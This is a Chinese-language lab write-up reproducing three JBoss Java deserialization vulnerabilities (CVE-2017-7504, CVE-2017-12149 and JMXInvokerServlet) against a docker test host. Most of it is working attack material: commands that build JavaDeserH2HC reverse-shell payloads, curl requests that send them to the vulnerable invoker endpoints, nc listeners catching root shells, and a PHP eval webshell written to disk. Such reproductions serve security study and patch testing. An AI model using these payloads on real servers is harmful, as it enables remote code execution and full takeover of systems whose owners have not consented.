JBOSS漏洞复现

(Updated: )
漏洞复现

0x00 前言

0x01 JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

漏洞说明

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞复现

1
docker-compose up -d

目标: http://192.168.220.151:8080

利用工具: JavaDeserH2HC

poc使用方法:

1
2
3
4
5
6
7
8
9
10
攻击机下载执行执行生成二进制payload文件:
 
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  
 #修改接收shell的主机ip和端口
 
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8080 (IP:端口)
 
curl向被攻击服务器发送攻击payload:
curl http://192.168.220.151:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

我们选择一个Gadget: ExampleCommonsCollections1WithHashMap

编译并生成序列化数据:

1
2
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

执行结果:

1
2
3
root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
Saving serialized object in ExampleCommonsCollections1WithHashMap.ser

我们执行的命令是touch /tmp/success,执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser,将该文件作为body发送如下数据包:

1
curl http://192.168.220.151:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

这个过程会产生一些警告,但好像不影响使用

执行 docker exec -ti 容器ID /bin/bash 进入容器

1
2
3
root@0ec136da132e:/opt/jdk# cd /tmp
root@0ec136da132e:/tmp# ls
hsperfdata_root  success

可以利用重定向写入一句话木马:

1
echo '<?php @eval(_POST['test']); ?> > /tmp/test.php

执行结果:

1
2
3
4
5
root@0ec136da132e:/tmp# ls
aa.php	hsperfdata_root  success
root@0ec136da132e:/tmp# cat aa.php 
<?php @eval(_POST[test]); ?>
root@0ec136da132e:/tmp#

参考

  1. https://github.com/joaomatosf/JavaDeserH2HC

0x02 JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

漏洞说明

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

漏洞复现

1
docker up -d

初始化完成后访问http://192.168.220.151:8080/即可看到JBoss默认页面
该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化

下载poc: https://github.com/joaomatosf/JavaDeserH2HC

使用poc:

1
2
3
4
root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 

root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8888
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

在攻击机上开启端口监听:

1
2
nc -lvvp 8888
listening on [any] 8888 ...

向目标发送payload:

1
2
3
4
root@kali:~/桌面/JavaDeserH2HC# curl http://192.168.220.151:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser 
<html><head><title>JBoss Web/3.0.0-CR2 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.lang.ClassCastException: java.util.HashSet cannot be cast to org.jboss.invocation.MarshalledInvocation
	org.jboss.invocation.http.servlet.ReadOnlyAccessFilter.doFilter(ReadOnlyAccessFilter.java:106)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the JBoss Web/3.0.0-CR2 logs.</u></p><HR size="1" noshade="noshade"><h3>JBoss Web/3.0.0-CR2</h3></body></html>root@kali:~/桌面/JavaDeserH2HC#

反弹shell成功!!!

1
2
3
4
5
6
7
8
root@kali:~# nc -lvvp 8888
listening on [any] 8888 ...
192.168.220.151: inverse host lookup failed: Unknown host
connect to [192.168.220.133] from (UNKNOWN) [192.168.220.151] 53530
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

参考

0x03 JMXInvokerServlet 反序列化漏洞

漏洞说明

这个漏洞与前两个差别不大,JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象。

所以,只要把url改成下面即可:

1
http://192.168.220.151:8080/invoker/JMXInvokerServlet
1
2
3
root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 
root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8888
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

在攻击机上开启端口监听:

1
2
nc -lvvp 8888
listening on [any] 8888 ...

向目标发送payload:

1
2
3
4
root@kali:~/桌面/JavaDeserH2HC# curl http://192.168.220.151:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser 
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

有几个警告,不影响操作。

反弹shell成功。

1
2
3
4
5
6
root@kali:~# nc -lvvp 8888
listening on [any] 8888 ...
192.168.220.151: inverse host lookup failed: Unknown host
connect to [192.168.220.133] from (UNKNOWN) [192.168.220.151] 41174
whoami
root